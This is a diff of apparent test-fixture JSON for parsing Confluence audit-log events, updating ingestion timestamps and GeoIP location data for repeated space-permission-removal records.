@@ -9837,7 +9237,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222560858Z", + "ingested": "2021-12-14T14:34:31.513243698Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.176Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9903,20 +9303,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -9924,7 +9318,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222562764Z", + "ingested": "2021-12-14T14:34:31.513244100Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.166Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9997,20 +9391,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10018,7 +9406,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222564676Z", + "ingested": "2021-12-14T14:34:31.513244488Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.160Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10091,20 +9479,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10112,7 +9494,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222570852Z", + "ingested": "2021-12-14T14:34:31.513244871Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.155Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10185,20 +9567,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10206,7 +9582,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222572912Z", + "ingested": "2021-12-14T14:34:31.513245264Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.149Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10272,20 +9648,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10293,7 +9663,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222574879Z", + "ingested": "2021-12-14T14:34:31.513245677Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.143Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10366,20 +9736,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10387,7 +9751,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222576773Z", + "ingested": "2021-12-14T14:34:31.513246061Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.137Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10460,20 +9824,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10481,7 +9839,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222578678Z", + "ingested": "2021-12-14T14:34:31.513246462Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.132Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10554,20 +9912,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10575,7 +9927,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222580554Z", + "ingested": "2021-12-14T14:34:31.513246852Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.128Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10648,20 +10000,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10669,7 +10015,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222582462Z", + "ingested": "2021-12-14T14:34:31.513247239Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.122Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10742,20 +10088,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10763,7 +10103,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222584346Z", + "ingested": "2021-12-14T14:34:31.513247756Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.115Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10829,20 +10169,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10850,7 +10184,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222586433Z", + "ingested": "2021-12-14T14:34:31.513248383Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.107Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10923,20 +10257,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -10944,7 +10272,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222588336Z", + "ingested": "2021-12-14T14:34:31.513248886Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.099Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -11017,20 +10345,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11038,7 +10360,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222590238Z", + "ingested": "2021-12-14T14:34:31.513249375Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.091Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -11111,20 +10433,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11132,7 +10448,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222592135Z", + "ingested": "2021-12-14T14:34:31.513249964Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.055Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -11198,20 +10514,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11219,7 +10529,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222594027Z", + "ingested": "2021-12-14T14:34:31.513250477Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.008Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -11305,20 +10615,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -11326,7 +10630,7 @@ }, "event": { "action": "audit.logging.summary.space.config.updated", - "ingested": "2021-12-08T15:08:08.222595915Z", + "ingested": "2021-12-14T14:34:31.513250869Z", "original": "{\"timestamp\":\"2021-11-23T00:39:36.900Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.spaces\",\"category\":\"Spaces\",\"actionI18nKey\":\"audit.logging.summary.space.config.updated\",\"action\":\"Space configuration updated\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"\"},{\"key\":\"Home page\",\"i18nKey\":\"Home page\",\"to\":\"page: asdf v.1 (65593)\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"asdf\"},{\"key\":\"Space key\",\"i18nKey\":\"Space key\",\"to\":\"ASDF\"},{\"key\":\"Space status\",\"i18nKey\":\"Space status\",\"to\":\"CURRENT\"},{\"key\":\"Space type\",\"i18nKey\":\"Space type\",\"to\":\"global\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "change" 